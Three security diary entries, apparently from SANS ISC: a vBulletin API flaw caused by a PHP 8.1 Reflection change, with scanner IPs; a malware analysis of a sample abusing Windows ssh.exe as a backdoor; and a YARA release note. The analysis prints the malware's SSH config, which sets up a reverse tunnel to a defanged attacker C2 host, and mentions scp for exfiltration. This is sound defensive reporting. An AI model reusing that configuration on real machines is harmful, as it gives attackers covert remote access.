Last week, Ryan Dewhurst disclosed an interesting and easily exploitable vulnerability in vBulltin. These days, bulletin boards are not quite as popular as they used to be, but they are still being used, and vBulletin is one of the most common commercially supported platforms to create a bulletin board. The vulnerability is remarkable as it exemplifies some common issues with patching and keeping your software up to date.

vBulletin is written in PHP (just like this website). To create a modern single-page application in PHP, one typically needs to create an API. This API often exposes internal classes. A URL like https://example.com/api/test may be called the "test" method in our "API" class. Of course, you may not want to expose all your methods to the API, but only select methods you think are safe to use. 

One way to restrict access to specific methods has been to mark them as "private." Only "public" methods are typically accessible from outside the particular class. To evaluate any function, vBulletin uses "Reflection," an API that allows your code to interrogate classes to see what is available and how to call specific methods. As brilliantly explained by Karmainsecurity [1], this is where the problem arises.

PHP 8.1 changed the behavior of the Reflection to allow the execution of private methods. Earlier, PHP used "ReflectionMethod::setAccessible" to regulate if a method was accessible. However, "As of PHP 8.1.0, calling this method has no effect; all methods are invokable by default." [2] This change is not very prominent, and it took me a while to find it after seeing it mentioned in the Karmainsecurity blog.

Lesson #1: Patches MAY include subtle changes in behavior, removing security controls that you are used to and expect to "just work."

The next issue is the patch for this vulnerability. The patch was released over a year ago, in April 2024 [3]. The patch notice mentions: "To maintain site security, you should apply this patch as soon as possible." There were no details, no CVEs, no statement as to the nature or impact of the vulnerabilities. In other words, There is no help gauging the criticality of the vulnerability.

Lesson #2: Patches MAY include essential security improvements, even if vendors do not disclose them.

In other words, If you upgrade PHP too early, you lose. If you upgrade vBulletin too late, you lose.

We started seeing exploit attempts on May 25th, two days after the blog post was released.

So far, we have seen these IP addresses scanning for the vulnerability:

195.3.221.137: This appears to be a mail server in Poland. It has been doing various recon scans for web applications starting back on May 12th.
169.150.203.14: This IP address is located with a British colo provider (Datapacket) and has done little other scanning. 
23.162.40.123: Scanning very much like 169.150.203.14. These may be under the control of the same threat actor. Located with Cyber Data.
176.65.149.193: Also similar to the prior two IPs.  
 

[1] https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce?ref=blog.kevintel.com
[2] https://www.php.net/manual/en/reflectionmethod.setaccessible.php
[3] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4491049-security-patch-released-for-vbulletin-6-x-and-5-7-5

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

For most system and network administrators, the free SSH client Putty has been their best friend for years! This tool was also (ab)used by attackers that deployed a trojanized version[1]. Microsoft had the good idea to include OpenSSH (beta version) in Windows 10 Fall Creators Update. One year later, it became a default component with Windows 10 version 1803. I remember the join of type for the first time "ssh" or "scp" in a cmd.exe! SSH is a very powerful tool that can be used in multiple ways, and it was de-facto categorized as a "LOLBIN"[2]. 

I'm hunting for scripts or binaries that refer to "C:\Windows\System32\OpenSSH\ssh.exe" and found an interesting sample. The file was uploaded on VT as "dllhost.exe" (SHA256:b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b) with a score of 18/71[3]. It tries to abuse ssh.exe to implement a simple backdoor on the victim's computer. It did not work when I started to analyze it on my REMWorkstation (the Windows system we used in FOR610[4]), I had to install OpenSSH manually. Let's review how it behaves.

First, the malware tries to start an existing "SSHService" service:

If it's not successfull, the malware tries to read a registry key (SOFTWARE\SSHservice) and access the previously saved random port:

If not found (first malware execution), a random port is generated:

Then saved:

A SSH configuration file is created, it contains the attacker's C2:

Now the malware enters an infinite loop and performs a long sleep at each iteration:

Then it tries to launch a ssh.exe process with the generated configuration file:

The malware creates the configuration file in c:\windows\temp\config:
Host version
    Hostname 193[.]187[.]174[.]3
    User ugueegfueuagu17t1424acs
    Port 443
    ServerAliveInterval 60
    ServerAliveCountMax 15
    RemoteForward 40909
    StrictHostKeyChecking no
    SessionType None

The C2 server was down but the configuration file in invalid, the line 7, the RemoteForward syntax is:

RemoteForward [bind_address:]port local_address:local_port

Conclusion: OpenSSH being available on most Windows hosts for a while, it deserves some monitoring! (scp.exe is a nice way to exfiltrate data)

[1] https://hivepro.com/threat-advisory/unc4034-slips-in-a-backdoor-with-trojanized-putty/
[2] https://lolbas-project.github.io/lolbas/Binaries/Ssh/
[3] https://www.virustotal.com/gui/file/b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b/details
[4] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

YARA 4.5.3 was released with 5 bugfixes.

I want to take this as an opportunity to remind you that YARA is to be replaced with YARA-X, a rewrite in Rust.

YARA-X is already powering VirusTotal.

Didier Stevens
Senior handler
blog.DidierStevens.com